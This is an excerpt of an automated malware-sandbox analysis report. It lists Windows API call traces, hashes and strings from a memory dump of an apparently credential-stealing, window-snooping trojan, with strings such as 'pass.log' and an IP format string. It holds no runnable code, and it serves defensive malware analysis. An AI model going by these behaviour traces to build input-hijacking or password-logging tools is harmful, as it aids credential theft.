                                                                                                                                                                                                            • Instruction Fuzzy Hash: 6A016935E81218BBE7209B94DD09FEE7B6CEF05B41F804684FB41A60C0D7F49A948BA5
                                                                                                                                                                                                            APIs
                                                                                                                                                                                                            • WaitForSingleObject.KERNEL32(?,000003E8,00000000,02BCA693,?,?,?,?,?,?,02BC98DA,00000000,02BC9730,02C0A04C), ref: 02BCA6BC
                                                                                                                                                                                                            • GetProcessHeap.KERNEL32(00000008,00000030,?,?,?,?,?,?,02BC98DA,00000000,02BC9730,02C0A04C), ref: 02BCA6C6
                                                                                                                                                                                                            • HeapAlloc.KERNEL32(00000000,?,?,?,?,?,?,02BC98DA,00000000,02BC9730,02C0A04C), ref: 02BCA6CD
                                                                                                                                                                                                            • memset.MSVCRT ref: 02BCA6DE
                                                                                                                                                                                                            • ReleaseMutex.KERNEL32(?,?,?,?,?,?,?,02BC98DA,00000000,02BC9730,02C0A04C), ref: 02BCA72A
                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                            • Source File: 00000002.00000002.2594339878.0000000002BB0000.00000040.00001000.00020000.00000000.sdmp, Offset: 02BB0000, based on PE: true
                                                                                                                                                                                                            • Associated: 00000002.00000002.2594339878.0000000002C09000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                            • Associated: 00000002.00000002.2594339878.0000000002C0E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                            Yara matches
                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                            • API ID: Heap$AllocMutexObjectProcessReleaseSingleWaitmemset
                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                            • API String ID: 819421891-0
                                                                                                                                                                                                            • Opcode ID: 3dcc49bd551b73925b072a380c2ca030c6ae72b49b452c10176c2f4d21dc3593
                                                                                                                                                                                                            • Instruction ID: df5e53a0fd42dce05a60125e0e2af11677a6404c3d8665ac72eac5495bc23f72
                                                                                                                                                                                                            • Opcode Fuzzy Hash: 3dcc49bd551b73925b072a380c2ca030c6ae72b49b452c10176c2f4d21dc3593
                                                                                                                                                                                                            • Instruction Fuzzy Hash: 4D0105B5A41B11AFC3A4CF28E494A06FBF4FF48740B108A19EA9A97B90C730B550CF94
                                                                                                                                                                                                            APIs
                                                                                                                                                                                                            • SetThreadDesktop.USER32(?,?,00000000,76F93080,?,02BB922C,?,00000006,00000000), ref: 02BBE38C
                                                                                                                                                                                                            • GetWindow.USER32(00000000,00000005), ref: 02BBE3A3
                                                                                                                                                                                                            • GetWindow.USER32(00000000), ref: 02BBE3A6
                                                                                                                                                                                                            • SendMessageA.USER32(00000000,00000006,?,02BB922C), ref: 02BBE3BD
                                                                                                                                                                                                            • GetWindow.USER32(00000000,00000003), ref: 02BBE3C2
                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                            • Source File: 00000002.00000002.2594339878.0000000002BB0000.00000040.00001000.00020000.00000000.sdmp, Offset: 02BB0000, based on PE: true
                                                                                                                                                                                                            • Associated: 00000002.00000002.2594339878.0000000002C09000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                            • Associated: 00000002.00000002.2594339878.0000000002C0E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                            Yara matches
                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                            • API ID: Window$DesktopMessageSendThread
                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                            • API String ID: 3855296974-0
                                                                                                                                                                                                            • Opcode ID: b04097a1a038360c9dc744a78c600bb046bd224bb95f00455d0ec92d2f9809f8
                                                                                                                                                                                                            • Instruction ID: 8250f286c82e90cc20d4e9cfc4a2dc18a300c2992411abdc38f77cd635c348dd
                                                                                                                                                                                                            • Opcode Fuzzy Hash: b04097a1a038360c9dc744a78c600bb046bd224bb95f00455d0ec92d2f9809f8
                                                                                                                                                                                                            • Instruction Fuzzy Hash: B0F01276A412187BD7319B69EC88EAFB79CDB887A0F418515FE0197390D6B0ED108BB0
                                                                                                                                                                                                            APIs
                                                                                                                                                                                                            • GetWindowThreadProcessId.USER32(?,00000000), ref: 02BBD2BC
                                                                                                                                                                                                            • GetCurrentThreadId.KERNEL32 ref: 02BBD2C4
                                                                                                                                                                                                            • AttachThreadInput.USER32(00000000,00000000,00000001), ref: 02BBD2D0
                                                                                                                                                                                                            • SendMessageA.USER32(?,0000000D,?,?), ref: 02BBD2E1
                                                                                                                                                                                                            • AttachThreadInput.USER32(00000000,00000000,00000000), ref: 02BBD2ED
                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                            • Source File: 00000002.00000002.2594339878.0000000002BB0000.00000040.00001000.00020000.00000000.sdmp, Offset: 02BB0000, based on PE: true
                                                                                                                                                                                                            • Associated: 00000002.00000002.2594339878.0000000002C09000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                            • Associated: 00000002.00000002.2594339878.0000000002C0E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                            Yara matches
                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                            • API ID: Thread$AttachInput$CurrentMessageProcessSendWindow
                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                            • API String ID: 2643679612-0
                                                                                                                                                                                                            • Opcode ID: 70b10d44adb67a164d65d49c246a28f6a88d13d77aba1ca7bcb1a01127ad0fa0
                                                                                                                                                                                                            • Instruction ID: 5e1d1d8c046da1a91c7ec4d4bbd33a2ea14526ae2135bacf49eaa46c61bc5c9d
                                                                                                                                                                                                            • Opcode Fuzzy Hash: 70b10d44adb67a164d65d49c246a28f6a88d13d77aba1ca7bcb1a01127ad0fa0
                                                                                                                                                                                                            • Instruction Fuzzy Hash: 66F037726412047FE3205B65EC8DFABBF6CEB497A1F544415FB05D7241C57198108770
                                                                                                                                                                                                            APIs
                                                                                                                                                                                                            • GetWindowThreadProcessId.USER32(?,00000000), ref: 02BBE34A
                                                                                                                                                                                                            • GetCurrentThreadId.KERNEL32 ref: 02BBE352
                                                                                                                                                                                                            • AttachThreadInput.USER32(00000000,00000000,00000001,?,?,?,?,02BB9F24,?,?,?,?,02BB9400,?,?), ref: 02BBE364
                                                                                                                                                                                                            • GetFocus.USER32 ref: 02BBE366
                                                                                                                                                                                                            • AttachThreadInput.USER32(00000000,00000000,00000000,?,?,?,?,02BB9F24,?,?,?,?,02BB9400,?,?), ref: 02BBE373
                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                            • Source File: 00000002.00000002.2594339878.0000000002BB0000.00000040.00001000.00020000.00000000.sdmp, Offset: 02BB0000, based on PE: true
                                                                                                                                                                                                            • Associated: 00000002.00000002.2594339878.0000000002C09000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                            • Associated: 00000002.00000002.2594339878.0000000002C0E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                            Yara matches
                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                            • API ID: Thread$AttachInput$CurrentFocusProcessWindow
                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                            • API String ID: 968181190-0
                                                                                                                                                                                                            • Opcode ID: dfb72236e084014cf5604db4d77c8892c11f1ec779aed610867de115e16e34cd
                                                                                                                                                                                                            • Instruction ID: d4447a4d103765cbf5bd8116566e0bcf459c4355632dd22e962f844121aeb4f6
                                                                                                                                                                                                            • Opcode Fuzzy Hash: dfb72236e084014cf5604db4d77c8892c11f1ec779aed610867de115e16e34cd
                                                                                                                                                                                                            • Instruction Fuzzy Hash: D8E09271E40308BBD62097A6AC4DFABBFACEB857A2F940455FB08D3240D5719C1087B4
                                                                                                                                                                                                            APIs
                                                                                                                                                                                                            • CreateDirectoryA.KERNEL32(00000000,00000000,02BC8E9D,?,?,?,?,?,?), ref: 02BB7987
                                                                                                                                                                                                            • GetLastError.KERNEL32(00000000,?,?,?,?,?,?), ref: 02BB7992
                                                                                                                                                                                                            • IsUserAnAdmin.SHELL32 ref: 02BB799A
                                                                                                                                                                                                            • PathMakeSystemFolderA.SHLWAPI(00000000), ref: 02BB79A5
                                                                                                                                                                                                            • SetLastError.KERNEL32(00000000,?,?,?,?,?,?), ref: 02BB79AC
                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                            • Source File: 00000002.00000002.2594339878.0000000002BB0000.00000040.00001000.00020000.00000000.sdmp, Offset: 02BB0000, based on PE: true
                                                                                                                                                                                                            • Associated: 00000002.00000002.2594339878.0000000002C09000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                            • Associated: 00000002.00000002.2594339878.0000000002C0E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                            Yara matches
                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                            • API ID: ErrorLast$AdminCreateDirectoryFolderMakePathSystemUser
                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                            • API String ID: 1233776721-0
                                                                                                                                                                                                            • Opcode ID: 955f36dae0a0f26872d46a4af85c0d707253eb553012cf36fefd35877766f0df
                                                                                                                                                                                                            • Instruction ID: 81821e7fca53d0866ce6cce7d55bcff53e907f3cfd17060305dea41bb677f232
                                                                                                                                                                                                            • Opcode Fuzzy Hash: 955f36dae0a0f26872d46a4af85c0d707253eb553012cf36fefd35877766f0df
                                                                                                                                                                                                            • Instruction Fuzzy Hash: C3D01232A42110ABD7721B35AC0C77E7964FF8DA85B884855FB42D2240DF64D1119765
                                                                                                                                                                                                            APIs
                                                                                                                                                                                                            • PathAddBackslashA.SHLWAPI(02C0C058), ref: 02BCB137
                                                                                                                                                                                                            • GetFileAttributesA.KERNEL32(?), ref: 02BCB175
                                                                                                                                                                                                            • PathFileExistsA.SHLWAPI(?), ref: 02BCB1B9
                                                                                                                                                                                                            Strings
                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                            • Source File: 00000002.00000002.2594339878.0000000002BB0000.00000040.00001000.00020000.00000000.sdmp, Offset: 02BB0000, based on PE: true
                                                                                                                                                                                                            • Associated: 00000002.00000002.2594339878.0000000002C09000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                            • Associated: 00000002.00000002.2594339878.0000000002C0E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                            Yara matches
                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                            • API ID: FilePath$AttributesBackslashExists
                                                                                                                                                                                                            • String ID: pass.log
                                                                                                                                                                                                            • API String ID: 2713433229-3890513154
                                                                                                                                                                                                            • Opcode ID: 3c4e3e35355dbe9adc53357f6c37ebd182908b8c981cad88d52f4884b09a48b0
                                                                                                                                                                                                            • Instruction ID: 195a2e09c96ed1b5584b17d615220af128518933d0684edaafc3f493efaafc55
                                                                                                                                                                                                            • Opcode Fuzzy Hash: 3c4e3e35355dbe9adc53357f6c37ebd182908b8c981cad88d52f4884b09a48b0
                                                                                                                                                                                                            • Instruction Fuzzy Hash: D61131719046484FCB218B2CA8557EB7BE4EB85305F2486D9DDDDC7300DB709594C7C0
                                                                                                                                                                                                            APIs
                                                                                                                                                                                                            • HttpAddRequestHeadersW.WININET(?,?,?,A0000000), ref: 02BC0F0D
                                                                                                                                                                                                            • HttpAddRequestHeadersA.WININET(?,Accept-Encoding:,00000012,A0000000), ref: 02BC0F20
                                                                                                                                                                                                            Strings
                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                            • Source File: 00000002.00000002.2594339878.0000000002BB0000.00000040.00001000.00020000.00000000.sdmp, Offset: 02BB0000, based on PE: true
                                                                                                                                                                                                            • Associated: 00000002.00000002.2594339878.0000000002C09000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                            • Associated: 00000002.00000002.2594339878.0000000002C0E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                            Yara matches
                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                            • API ID: HeadersHttpRequest
                                                                                                                                                                                                            • String ID: ($Accept-Encoding:
                                                                                                                                                                                                            • API String ID: 1754618566-3981465706
                                                                                                                                                                                                            • Opcode ID: c057e52145d4a1ce2ecc0fa0981cc355825f231d55d2a995aa34004a27781a85
                                                                                                                                                                                                            • Instruction ID: 6dfe0d39e90b03ce9ea55d69e88e8a912d4796e891da50a0ddb9ee32e78391c3
                                                                                                                                                                                                            • Opcode Fuzzy Hash: c057e52145d4a1ce2ecc0fa0981cc355825f231d55d2a995aa34004a27781a85
                                                                                                                                                                                                            • Instruction Fuzzy Hash: BB113DB1A04305AFD750DF79D884B5B77E8EB88350F104E1EF955D3241E330D9448BA2
                                                                                                                                                                                                            APIs
                                                                                                                                                                                                            • free.MSVCRT(?,76E67310,00000000,02BDA320), ref: 02BE41EB
                                                                                                                                                                                                            • free.MSVCRT(?,76E67310,00000000,02BDA320), ref: 02BE41FD
                                                                                                                                                                                                            • free.MSVCRT(?,76E67310,00000000,02BDA320), ref: 02BE420F
                                                                                                                                                                                                            • free.MSVCRT(?,76E67310,00000000,02BDA320), ref: 02BE4221
                                                                                                                                                                                                            • free.MSVCRT(?,76E67310,00000000,02BDA320), ref: 02BE422B
                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                            • Source File: 00000002.00000002.2594339878.0000000002BB0000.00000040.00001000.00020000.00000000.sdmp, Offset: 02BB0000, based on PE: true
                                                                                                                                                                                                            • Associated: 00000002.00000002.2594339878.0000000002C09000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                            • Associated: 00000002.00000002.2594339878.0000000002C0E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                            Yara matches
                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                            • API ID: free
                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                            • API String ID: 1294909896-0
                                                                                                                                                                                                            • Opcode ID: e0c5b0a50b97dcbe6f36943075598fafebcf716320aa19ca434bf4acb8713c3e
                                                                                                                                                                                                            • Instruction ID: 778b95d2c7d046246308fb585423397a41f60f0dbdac0ee0657c8f031cf9f003
                                                                                                                                                                                                            • Opcode Fuzzy Hash: e0c5b0a50b97dcbe6f36943075598fafebcf716320aa19ca434bf4acb8713c3e
                                                                                                                                                                                                            • Instruction Fuzzy Hash: 11014CA2A517815BDF30DFA9989141BBBF5EE4410835988BED1DB87A04D331F8889B12
                                                                                                                                                                                                            APIs
                                                                                                                                                                                                            • malloc.MSVCRT ref: 02BE13F9
                                                                                                                                                                                                            • realloc.MSVCRT ref: 02BE1405
                                                                                                                                                                                                            • malloc.MSVCRT ref: 02BE14AC
                                                                                                                                                                                                            • realloc.MSVCRT ref: 02BE14B8
                                                                                                                                                                                                              • Part of subcall function 02BE0EA0: __WSAFDIsSet.WS2_32(?,?), ref: 02BE0F50
                                                                                                                                                                                                              • Part of subcall function 02BE0EA0: closesocket.WS2_32(?), ref: 02BE0F6D
                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                            • Source File: 00000002.00000002.2594339878.0000000002BB0000.00000040.00001000.00020000.00000000.sdmp, Offset: 02BB0000, based on PE: true
                                                                                                                                                                                                            • Associated: 00000002.00000002.2594339878.0000000002C09000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                            • Associated: 00000002.00000002.2594339878.0000000002C0E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                            Yara matches
                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                            • API ID: mallocrealloc$closesocket
                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                            • API String ID: 403730927-0
                                                                                                                                                                                                            • Opcode ID: 24a2729d802a08fa3b2de5630f1d214bf5b352c82b8db60fa9d5dee3d10a9759
                                                                                                                                                                                                            • Instruction ID: e6dc9d63481d118238cf4757462e9bcda7c168b2002e48101d0cc4a1c13aab02
                                                                                                                                                                                                            • Opcode Fuzzy Hash: 24a2729d802a08fa3b2de5630f1d214bf5b352c82b8db60fa9d5dee3d10a9759
                                                                                                                                                                                                            • Instruction Fuzzy Hash: 75B1B372E146068FCF08CF68D990AE537A6EF84341F1985B9ED0E9F346D774A911CBA0
                                                                                                                                                                                                            APIs
                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                            • Source File: 00000002.00000002.2594339878.0000000002BB0000.00000040.00001000.00020000.00000000.sdmp, Offset: 02BB0000, based on PE: true
                                                                                                                                                                                                            • Associated: 00000002.00000002.2594339878.0000000002C09000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                            • Associated: 00000002.00000002.2594339878.0000000002C0E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                            Yara matches
                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                            • API ID: fwrite$fseek
                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                            • API String ID: 3883414211-0
                                                                                                                                                                                                            • Opcode ID: 4e3adf7ae27ea3783be0a9909eacad6eb5c3e3c863427851cb20aa436f6cff17
                                                                                                                                                                                                            • Instruction ID: 8e823667cba240332e488fd528babdcb7d6d36537d6df364f98927347409b1d0
                                                                                                                                                                                                            • Opcode Fuzzy Hash: 4e3adf7ae27ea3783be0a9909eacad6eb5c3e3c863427851cb20aa436f6cff17
                                                                                                                                                                                                            • Instruction Fuzzy Hash: F421D0B0A407059FD720CFA8CC41BAEBBF5EF98300F14896DE585E7385E2B4A944CB90
                                                                                                                                                                                                            APIs
                                                                                                                                                                                                            • memset.MSVCRT ref: 02BC2392
                                                                                                                                                                                                            • GetParent.USER32(?), ref: 02BC239E
                                                                                                                                                                                                            • GetWindowTextW.USER32(00000000,?,00000104), ref: 02BC23B5
                                                                                                                                                                                                            • StrStrIW.SHLWAPI(?,00000000,?,?,?,?,00000000), ref: 02BC23D6
                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                            • Source File: 00000002.00000002.2594339878.0000000002BB0000.00000040.00001000.00020000.00000000.sdmp, Offset: 02BB0000, based on PE: true
                                                                                                                                                                                                            • Associated: 00000002.00000002.2594339878.0000000002C09000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                            • Associated: 00000002.00000002.2594339878.0000000002C0E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                            Yara matches
                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                            • API ID: ParentTextWindowmemset
                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                            • API String ID: 4175915554-0
                                                                                                                                                                                                            • Opcode ID: 9dcd06ed8578c6f68efa3cad6d5b0d3757119169d568e06d943efb1d31c43956
                                                                                                                                                                                                            • Instruction ID: 257395ed3f623d7a43c3eb77de86609f8cf3c78d6f45bc289a34343a1f2b1c4a
                                                                                                                                                                                                            • Opcode Fuzzy Hash: 9dcd06ed8578c6f68efa3cad6d5b0d3757119169d568e06d943efb1d31c43956
                                                                                                                                                                                                            • Instruction Fuzzy Hash: 2401F573B403246BD7209A6DAC88AA7B36DEB40555F5082BAFF49E3201EA70D95487E0
                                                                                                                                                                                                            APIs
                                                                                                                                                                                                            • GetProcessHeap.KERNEL32(00000008,00000020,00000000,-00000010,?,02BB432B,?), ref: 02BB409C
                                                                                                                                                                                                            • HeapAlloc.KERNEL32(00000000,?,02BB432B,?), ref: 02BB40A3
                                                                                                                                                                                                            • _snprintf.MSVCRT ref: 02BB40E2
                                                                                                                                                                                                            Strings
                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                            • Source File: 00000002.00000002.2594339878.0000000002BB0000.00000040.00001000.00020000.00000000.sdmp, Offset: 02BB0000, based on PE: true
                                                                                                                                                                                                            • Associated: 00000002.00000002.2594339878.0000000002C09000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                            • Associated: 00000002.00000002.2594339878.0000000002C0E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                            Yara matches
                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                            • API ID: Heap$AllocProcess_snprintf
                                                                                                                                                                                                            • String ID: %d.%d.%d.%d
                                                                                                                                                                                                            • API String ID: 1060465051-3491811756
                                                                                                                                                                                                            • Opcode ID: 50368f5fb50ae9186960708600e48120e7a41989c617a9434d2e79796f99eee3
                                                                                                                                                                                                            • Instruction ID: fba483f3abb853bac900456353962cc15e0d9d27534b79def3f5e5b0c31d69ee
                                                                                                                                                                                                            • Opcode Fuzzy Hash: 50368f5fb50ae9186960708600e48120e7a41989c617a9434d2e79796f99eee3
                                                                                                                                                                                                            • Instruction Fuzzy Hash: 76F081B1940710AFD3B0CF6D9804B66BBE8EF0C651B40892EF69AC7641D23491148BB0
                                                                                                                                                                                                            APIs
                                                                                                                                                                                                            • TerminateThread.KERNEL32(00000000,00000000,?,?,02BC8BDE,00000000,02BC0BE3,?,?,?,?,?,?), ref: 02BCB8A0
                                                                                                                                                                                                            • CreateThread.KERNEL32(00000000,00000000,02BCB740,00000000,00000000,00000000), ref: 02BCB8B5
                                                                                                                                                                                                            • GetHandleInformation.KERNEL32(00000000,02BC0BE3,00000000,?,?,02BC8BDE,00000000), ref: 02BCB8D3
                                                                                                                                                                                                            • CloseHandle.KERNEL32(00000000,?,?,02BC8BDE,00000000), ref: 02BCB8E4
                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                            • Source File: 00000002.00000002.2594339878.0000000002BB0000.00000040.00001000.00020000.00000000.sdmp, Offset: 02BB0000, based on PE: true
                                                                                                                                                                                                            • Associated: 00000002.00000002.2594339878.0000000002C09000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                            • Associated: 00000002.00000002.2594339878.0000000002C0E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                            Yara matches
                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                            • API ID: HandleThread$CloseCreateInformationTerminate
                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                            • API String ID: 1825730051-0
                                                                                                                                                                                                            • Opcode ID: fd88eab2c7ba76ff40079f4aecfe7b236d5e37179b1fdb5099da81145f6cc21d
                                                                                                                                                                                                            • Instruction ID: a2c7866aae18e335454f32a516ad4e128752a8a92974cfd45b946ef873380998
                                                                                                                                                                                                            • Opcode Fuzzy Hash: fd88eab2c7ba76ff40079f4aecfe7b236d5e37179b1fdb5099da81145f6cc21d
                                                                                                                                                                                                            • Instruction Fuzzy Hash: 0EF05474A84304BBE7709B65EC4BF5E37ACEB05B49F600598FA05E71C0D7B4B5108B64
                                                                                                                                                                                                            Strings
                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                            • Source File: 00000002.00000002.2594339878.0000000002BB0000.00000040.00001000.00020000.00000000.sdmp, Offset: 02BB0000, based on PE: true
                                                                                                                                                                                                            • Associated: 00000002.00000002.2594339878.0000000002C09000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                            • Associated: 00000002.00000002.2594339878.0000000002C0E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                            Yara matches
                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                            • API ID:
                                                                                                                                                                                                            • String ID: private$public
                                                                                                                                                                                                            • API String ID: 0-4176808989
                                                                                                                                                                                                            • Opcode ID: 4a4bcab08c96a9de7a17b48292f18dc2a104350d9cef34a231953395ab11e24a
                                                                                                                                                                                                            • Instruction ID: 39843ed77b78efe42e3a7413c1cb371f84b9090feec5068c6fbfc9ec0bd891b1
                                                                                                                                                                                                            • Opcode Fuzzy Hash: 4a4bcab08c96a9de7a17b48292f18dc2a104350d9cef34a231953395ab11e24a
                                                                                                                                                                                                            • Instruction Fuzzy Hash: F7414B326042058BCF388A6C85553B67363EBC5358B7846EFD94A8BA54F7A1E545C780
                                                                                                                                                                                                            APIs
                                                                                                                                                                                                            Strings
                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                            • Source File: 00000002.00000002.2594339878.0000000002BB0000.00000040.00001000.00020000.00000000.sdmp, Offset: 02BB0000, based on PE: true
                                                                                                                                                                                                            • Associated: 00000002.00000002.2594339878.0000000002C09000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                            • Associated: 00000002.00000002.2594339878.0000000002C0E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                            Yara matches
                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                            • API ID: CountTick_snprintf
                                                                                                                                                                                                            • String ID: %dd %dh %dm
                                                                                                                                                                                                            • API String ID: 3495410349-3074259717
                                                                                                                                                                                                            • Opcode ID: 69643174109c5536fcbcbd6e718db5f21fcc47196105d10d64fd02d6b1914d08
                                                                                                                                                                                                            • Instruction ID: 54aa08604c8f0f16efe1d5eca1bab5010fda2194527d0da693eb84138db5a1e4
                                                                                                                                                                                                            • Opcode Fuzzy Hash: 69643174109c5536fcbcbd6e718db5f21fcc47196105d10d64fd02d6b1914d08
                                                                                                                                                                                                            • Instruction Fuzzy Hash: C6F0E272B8111417A36C541E6C0AAAA598BC7C83113CCC63CFE0BCF3D8DDA49C5142D0
                                                                                                                                                                                                            APIs
                                                                                                                                                                                                            • malloc.MSVCRT ref: 02BDB0AE
                                                                                                                                                                                                            • malloc.MSVCRT ref: 02BDB0C3
                                                                                                                                                                                                            • malloc.MSVCRT ref: 02BDB0E9
                                                                                                                                                                                                            • malloc.MSVCRT ref: 02BDB104
                                                                                                                                                                                                              • Part of subcall function 02BDA9D0: free.MSVCRT(?,?,?,76E67310,?,02BDCEC2,?,?,?,02BDA2D8), ref: 02BDA9FF
                                                                                                                                                                                                              • Part of subcall function 02BDA9D0: free.MSVCRT(02BDCEC2,?,?,76E67310,?,02BDCEC2,?,?,?,02BDA2D8), ref: 02BDAA0F
                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                            • Source File: 00000002.00000002.2594339878.0000000002BB0000.00000040.00001000.00020000.00000000.sdmp, Offset: 02BB0000, based on PE: true
                                                                                                                                                                                                            • Associated: 00000002.00000002.2594339878.0000000002C09000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                            • Associated: 00000002.00000002.2594339878.0000000002C0E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                            Yara matches
                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                            • API ID: malloc$free
                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                            • API String ID: 1480856625-0
                                                                                                                                                                                                            • Opcode ID: 1ff6215390c1cc3faaad82fab9e7b65c946c87036aa253557814946080e39a38
                                                                                                                                                                                                            • Instruction ID: 5c588fcbd2237a84ed566351586b33b83c61fe3700a8216eb36cdb464ce8718b
                                                                                                                                                                                                            • Opcode Fuzzy Hash: 1ff6215390c1cc3faaad82fab9e7b65c946c87036aa253557814946080e39a38
                                                                                                                                                                                                            • Instruction Fuzzy Hash: 4B21AFB16013059FD710CF1AD984A46FBE8FF99310F15C5AAE6498B362D7B5E910CFA0
                                                                                                                                                                                                            APIs
                                                                                                                                                                                                            • GetProcessHeap.KERNEL32(00000008,00000014,00000000,?,?,?,02BBEF5B,00000000,?,?,00000000,Content-Type,?,?,00000000,Referer), ref: 02BBEB1F
                                                                                                                                                                                                            • HeapAlloc.KERNEL32(00000000,?,02BBEF5B,00000000,?,?,00000000,Content-Type,?,?,00000000,Referer,?), ref: 02BBEB26
                                                                                                                                                                                                            • memset.MSVCRT ref: 02BBEB36
                                                                                                                                                                                                            • memcpy.MSVCRT ref: 02BBEB41
                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                            • Source File: 00000002.00000002.2594339878.0000000002BB0000.00000040.00001000.00020000.00000000.sdmp, Offset: 02BB0000, based on PE: true
                                                                                                                                                                                                            • Associated: 00000002.00000002.2594339878.0000000002C09000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                            • Associated: 00000002.00000002.2594339878.0000000002C0E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                            Yara matches
                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                            • API ID: Heap$AllocProcessmemcpymemset
                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                            • API String ID: 471586229-0
                                                                                                                                                                                                            • Opcode ID: 7423c6a89965f8944d68b4886f373f8f7a6adb4de3f56fc3cb5ca7e7a099eb0e
                                                                                                                                                                                                            • Instruction ID: c80bd25a5b6b541bd2388f965fdf9b30b61584d8f4a9929b50189f603fa890c8
                                                                                                                                                                                                            • Opcode Fuzzy Hash: 7423c6a89965f8944d68b4886f373f8f7a6adb4de3f56fc3cb5ca7e7a099eb0e
                                                                                                                                                                                                            • Instruction Fuzzy Hash: 7601F2336002156BD7329A68ACC4FEBB7ECEF46760B844781FE16CB191D760E90487E0
                                                                                                                                                                                                            APIs
                                                                                                                                                                                                            • GetProcessHeap.KERNEL32(00000008,?,?,?,00000000,?,02BBFA2B,?,?,?), ref: 02BBF388
                                                                                                                                                                                                            • HeapAlloc.KERNEL32(00000000,?,02BBFA2B,?,?,?), ref: 02BBF38F
                                                                                                                                                                                                            • memset.MSVCRT ref: 02BBF39F
                                                                                                                                                                                                            • memcpy.MSVCRT ref: 02BBF3AA
                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                            • Source File: 00000002.00000002.2594339878.0000000002BB0000.00000040.00001000.00020000.00000000.sdmp, Offset: 02BB0000, based on PE: true
                                                                                                                                                                                                            • Associated: 00000002.00000002.2594339878.0000000002C09000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                            • Associated: 00000002.00000002.2594339878.0000000002C0E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                            Yara matches
                                                                                                                                                                                                            Similarity
